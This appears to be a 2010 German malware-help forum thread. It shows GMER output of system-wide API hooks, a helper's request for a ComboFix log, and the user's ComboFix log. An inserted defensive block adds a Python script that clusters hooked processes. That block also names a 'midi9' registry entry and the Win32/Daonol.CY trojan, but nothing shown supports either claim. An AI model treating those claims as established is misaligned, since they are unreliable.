.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\lsass.exe[832] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\lsass.exe[832] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\lsass.exe[832] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\svchost.exe[1000] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\svchost.exe[1000] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\svchost.exe[1000] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\ctfmon.exe[1036] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\ctfmon.exe[1036] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\ctfmon.exe[1036] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\System32\svchost.exe[1116] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\System32\svchost.exe[1116] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\System32\svchost.exe[1116] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 100A3DF4
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 100A3C3C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 100A3E78
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!connect 71A14A07 5 Bytes JMP 100A3AF0
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!send 71A14C27 5 Bytes JMP 100A3264
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100A27F8
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!recv 71A1676F 5 Bytes JMP 100A278C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 100A3A9C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Messenger\msmsgs.exe[1300] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Messenger\msmsgs.exe[1300] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Messenger\msmsgs.exe[1300] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\spoolsv.exe[1696] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\spoolsv.exe[1696] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\spoolsv.exe[1696] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!SetUnhandledExceptionFilter 7C84495D 4 Bytes [C2, 04, 00, 00]
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10143DF4
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10143C3C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10143E78
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10143AF0
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!send 71A14C27 5 Bytes JMP 10143264
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 101427F8
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1014278C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10143A9C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\taskmgr.exe[3192] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\taskmgr.exe[3192] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\taskmgr.exe[3192] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\taskmgr.exe[3192]
WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264 .text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8 .text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C .text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C ---- Devices - GMER 1.0.15 ---- AttachedDevice \FileSystem\Ntfs \Ntfs eamon.sys (Amon monitor/ESET) AttachedDevice \FileSystem\Ntfs \Ntfs InCDrec.SYS (InCD File System Recognizer/Nero AG) AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.) AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.) AttachedDevice \Driver\Tcpip \Device\Tcp epfwtdir.sys (ESET Antivirus Network Redirector/ESET) AttachedDevice \FileSystem\Fastfat \Fat eamon.sys (Amon monitor/ESET) ---- EOF - GMER 1.0.15 ---- sejott |
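What the GMER output above shows, read as a defender: every listed process has the first 5 bytes of the same exported functions (ws2_32 connect/send/recv/WSASend/WSARecv, ntdll NtOpenKey, kernel32 CreateProcessW/ExitProcess) overwritten with a JMP, and the JMP targets of one process differ from those of another only by a constant (10003AF0 in spoolsv.exe versus 10143AF0 in EvtEng.exe). That is the footprint of one hooking DLL loaded into every process at a different base address, not of each program patching its own imports; the ComboFix log later in this thread ties it to the drivers32 "midi9" entry pointing at org.bak, which ESET then identified as Win32/Daonol.CY. The following is an added triage script, not code from the original post or from GMER: it parses hook lines in the format GMER prints and groups processes by their relative hook profile. The sample lines are constructed after the posted log, and all function names are this example's own.

```python
"""Triage helper for GMER user-mode hook lines (added example, not GMER code).

Parses lines of the form
  .text <image>[<pid>] <module>!<function> <addr> <N> Bytes JMP <target>
and groups processes whose JMP hooks share one relative layout, which is what
a single injected module loaded at a different base in each process produces.
"""
import re
from collections import defaultdict

HOOK_RE = re.compile(
    r"^\.text\s+(?P<image>.+?)\[(?P<pid>\d+)\]\s+"
    r"(?P<module>[\w.]+)!(?P<func>\w+)\s+"
    r"(?P<addr>[0-9A-Fa-f]{8})\s+(?P<nbytes>\d+)\s+Bytes\s+"
    r"(?:JMP\s+(?P<target>[0-9A-Fa-f]{8})|(?P<patch>\[[0-9A-Fa-f, ]+\]))\s*$"
)

# Constructed sample in GMER's format, modelled on the log posted above
# (three of the processes it lists, with their addresses).
SAMPLE_LINES = [
    r".text C:\WINDOWS\system32\spoolsv.exe[1696] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4",
    r".text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0",
    r".text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264",
    r".text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4",
    r".text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!SetUnhandledExceptionFilter 7C84495D 4 Bytes [C2, 04, 00, 00]",
    r".text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0",
    r".text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264",
    r".text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10143DF4",
    r".text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10143AF0",
    r".text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!send 71A14C27 5 Bytes JMP 10143264",
    "---- Devices - GMER 1.0.15 ----",
]
SAMPLE_LOG = "\n".join(SAMPLE_LINES)


def parse_hooks(text):
    """Return one dict per recognised hook line; other lines are skipped."""
    hooks = []
    for line in text.splitlines():
        m = HOOK_RE.match(line.strip())
        if not m:
            continue
        h = m.groupdict()
        h["pid"] = int(h["pid"])
        h["nbytes"] = int(h["nbytes"])
        # Normalise the module name so ws2_32.dll and WS2_32.dll are one API.
        h["api"] = f"{h['module'].lower()}!{h['func']}"
        # Inline byte patches (no JMP) keep target=None.
        h["target"] = int(h["target"], 16) if h["target"] else None
        hooks.append(h)
    return hooks


def hooks_by_process(hooks):
    """Map (image path, pid) to that process's hook entries."""
    by_proc = defaultdict(list)
    for h in hooks:
        by_proc[(h["image"], h["pid"])].append(h)
    return by_proc


def jump_profile(proc_hooks):
    """Fingerprint of a process's JMP hooks: each hooked API paired with its
    target's offset from the lowest target in that process. The same injected
    module at different load addresses yields the same profile."""
    targets = [h["target"] for h in proc_hooks if h["target"] is not None]
    if not targets:
        return ()
    base = min(targets)
    return tuple(sorted((h["api"], h["target"] - base)
                        for h in proc_hooks if h["target"] is not None))


def cluster_processes(hooks):
    """Group processes that share one relative JMP profile."""
    clusters = defaultdict(list)
    for proc, proc_hooks in hooks_by_process(hooks).items():
        clusters[jump_profile(proc_hooks)].append(proc)
    return dict(clusters)


def shared_api_hooks(hooks, min_processes=2):
    """APIs redirected by an inline JMP in at least min_processes distinct
    processes, mapped to that process count."""
    procs = defaultdict(set)
    for h in hooks:
        if h["target"] is not None:
            procs[h["api"]].add((h["image"], h["pid"]))
    return {api: len(p) for api, p in procs.items() if len(p) >= min_processes}


if __name__ == "__main__":
    hooks = parse_hooks(SAMPLE_LOG)
    print(f"{len(hooks)} hook lines in {len(hooks_by_process(hooks))} processes")
    for procs in cluster_processes(hooks).values():
        print(f"{len(procs)} process(es) share one hook profile:")
        for image, pid in procs:
            print(f"  {image}[{pid}]")
    for api, n in sorted(shared_api_hooks(hooks).items()):
        print(f"  {api} redirected in {n} processes")
```

Run against the full GMER log from the post, this collapses every listed process into one cluster (EvtEng.exe included, despite its 1014xxxx targets), which is the quick way to tell a system-wide injected hooking module from unrelated per-application hooks such as the 4-byte SetUnhandledExceptionFilter patch in ekrn.exe.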
25.06.2010, 21:28 | #2 |
/// Malware-holic | Please create and post a ComboFix log.
__________________ A guide and tutorial on using ComboFix |
26.06.2010, 01:57 | #3 |
| Hello Markusg,
thanks for the help. ComboFix worked, deleted a few things and rebooted. Here is the log: Code:
ATTFilter
ComboFix 10-06-25.01 - *** 25.06.2010 23:48:59.1.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.49.1031.18.1014.565 [GMT 2:00]
ausgeführt von:: c:\dokumente und einstellungen\***\Desktop\ComboFix.exe
AV: ESET NOD32 Antivirus 4.2 *On-access scanning disabled* (Outdated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
.
(((((((((((((((((((((((((((((((((((( Weitere Löschungen ))))))))))))))))))))))))))))))))))))))))))))))))
.
c:\dokume~1\***\LOKALE~1\Temp\org.bak
c:\dokumente und einstellungen\***\Lokale Einstellungen\Temp\org.bak
c:\windows\system32\1.tmp
c:\windows\system32\csftxctl.ocx
c:\windows\system32\win.ini
.
((((((((((((((((((((((( Dateien erstellt von 2010-05-25 bis 2010-06-25 ))))))))))))))))))))))))))))))
.
2010-06-25 21:58 . 2010-06-25 21:58 -------- d-----w- c:\windows\system32\xircom
2010-06-25 21:58 . 2010-06-25 21:58 -------- d-----w- c:\windows\system32\wbem\snmp
2010-06-25 21:58 . 2010-06-25 21:58 -------- d-----w- c:\programme\microsoft frontpage
2010-06-20 19:01 . 2010-06-20 19:01 -------- d-----w- c:\dokumente und einstellungen\***\Anwendungsdaten\Malwarebytes
2010-06-20 19:01 . 2010-04-29 10:19 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2010-06-20 19:01 . 2010-06-20 19:01 -------- d-----w- c:\dokumente und einstellungen\All Users\Anwendungsdaten\Malwarebytes
2010-06-20 19:01 . 2010-04-29 10:19 20952 ----a-w- c:\windows\system32\drivers\mbam.sys
2010-06-20 19:01 . 2010-06-20 22:55 -------- d-----w- c:\programme\Malwarebytes' Anti-Malware
2010-06-20 18:44 . 2010-06-20 18:44 77312 ----a-w- C:\mbr.exe
2010-06-19 18:33 . 2010-06-19 18:33 -------- d-----w- c:\programme\Sophos
2010-06-18 11:17 . 2010-06-18 11:17 -------- d-----w- c:\programme\Trend Micro
2010-06-15 00:28 . 2010-06-15 01:02 -------- d---a-w- C:\Kaspersky Rescue Disk 10.0
2010-06-14 14:00 . 2010-06-14 14:00 -------- d-----w- c:\dokumente und einstellungen\***\Lokale Einstellungen\Anwendungsdaten\ESET
2010-06-14 11:51 . 2010-06-14 11:51 -------- d-----w- c:\programme\ESET
2010-06-14 11:51 . 2010-06-14 11:51 -------- d-----w- c:\dokumente und einstellungen\All Users\Anwendungsdaten\ESET
2010-06-11 10:13 . 2010-04-20 05:29 285696 ------w- c:\windows\system32\dllcache\atmfd.dll
2010-06-11 10:13 . 2009-10-21 05:38 75776 ------w- c:\windows\system32\dllcache\strmfilt.dll
2010-06-11 10:13 . 2009-10-21 05:38 25088 ------w- c:\windows\system32\dllcache\httpapi.dll
2010-06-11 10:13 . 2009-10-20 16:20 265728 ------w- c:\windows\system32\dllcache\http.sys
2010-06-11 10:12 . 2010-03-05 14:37 65536 ------w- c:\windows\system32\dllcache\asycfilt.dll
2010-06-10 22:20 . 2010-06-11 10:34 -------- d-----w- C:\Meine Webseiten
2010-06-10 22:16 . 2010-06-10 22:17 -------- d-----w- c:\programme\WinHTTrack
2010-06-08 17:10 . 2010-01-29 14:59 691712 ------w- c:\windows\system32\dllcache\inetcomm.dll
2010-06-08 17:09 . 2010-03-09 11:07 430080 ------w- c:\windows\system32\dllcache\vbscript.dll
2010-06-08 17:09 . 2010-02-12 04:33 100864 ------w- c:\windows\system32\dllcache\6to4svc.dll
2010-06-08 17:09 . 2010-02-24 11:57 457216 ------w- c:\windows\system32\dllcache\mrxsmb.sys
2010-06-08 17:08 . 2009-10-23 15:28 3558912 ------w- c:\windows\system32\dllcache\moviemk.exe
2010-06-08 17:08 . 2009-12-17 07:40 346624 ------w- c:\windows\system32\dllcache\mspaint.exe
2010-06-08 17:08 . 2009-12-31 16:50 353792 ------w- c:\windows\system32\dllcache\srv.sys
2010-06-08 17:08 . 2009-11-27 16:08 8704 ------w- c:\windows\system32\dllcache\tsbyuv.dll
2010-06-08 17:08 . 2009-11-27 16:08 85504 ------w- c:\windows\system32\dllcache\avifil32.dll
2010-06-08 17:08 . 2009-11-27 16:08 48128 ------w- c:\windows\system32\dllcache\iyuv_32.dll
2010-06-08 17:08 . 2009-11-27 16:08 28672 ------w- c:\windows\system32\dllcache\msvidc32.dll
2010-06-08 17:08 . 2009-11-27 16:08 11264 ------w- c:\windows\system32\dllcache\msrle32.dll
2010-06-08 17:06 . 2009-10-15 16:28 81920 ------w- c:\windows\system32\dllcache\fontsub.dll
2010-06-08 17:06 . 2009-10-15 16:28 119808 ------w- c:\windows\system32\dllcache\t2embed.dll
2010-06-08 17:05 . 2009-11-21 15:54 471552 ------w- c:\windows\system32\dllcache\aclayers.dll
2010-06-08 17:05 . 2009-10-13 10:32 271360 ------w- c:\windows\system32\dllcache\oakley.dll
2010-06-08 17:05 . 2009-10-12 13:29 79872 ------w- c:\windows\system32\dllcache\raschap.dll
2010-06-08 17:04 . 2009-06-25 08:41 54272 ------w- c:\windows\system32\dllcache\wdigest.dll
2010-06-08 17:04 . 2009-06-25 08:41 301568 ------w- c:\windows\system32\dllcache\kerberos.dll
2010-06-08 17:04 . 2009-09-11 14:14 136704 ------w- c:\windows\system32\dllcache\msv1_0.dll
2010-06-08 17:04 . 2009-06-24 10:28 92928 ------w- c:\windows\system32\dllcache\ksecdd.sys
2010-06-08 17:03 . 2009-07-17 16:15 1441792 ------w- c:\windows\system32\dllcache\query.dll
2010-06-08 17:03 . 2009-08-26 08:00 247326 ------w- c:\windows\system32\dllcache\strmdll.dll
2010-06-08 17:03 . 2009-09-04 21:03 58880 ------w- c:\windows\system32\dllcache\msasn1.dll
2010-06-08 17:02 . 2009-08-13 15:15 512000 ------w- c:\windows\system32\dllcache\jscript.dll
2010-06-08 17:01 . 2009-06-21 21:45 153088 ------w- c:\windows\system32\dllcache\triedit.dll
2010-06-08 17:01 . 2009-06-10 06:17 134144 ------w- c:\windows\system32\dllcache\wkssvc.dll
2010-06-08 17:01 . 2009-08-05 08:59 206336 ------w- c:\windows\system32\dllcache\mswebdvd.dll
2010-06-08 17:01 . 2009-06-15 11:08 82944 ------w- c:\windows\system32\dllcache\tlntsess.exe
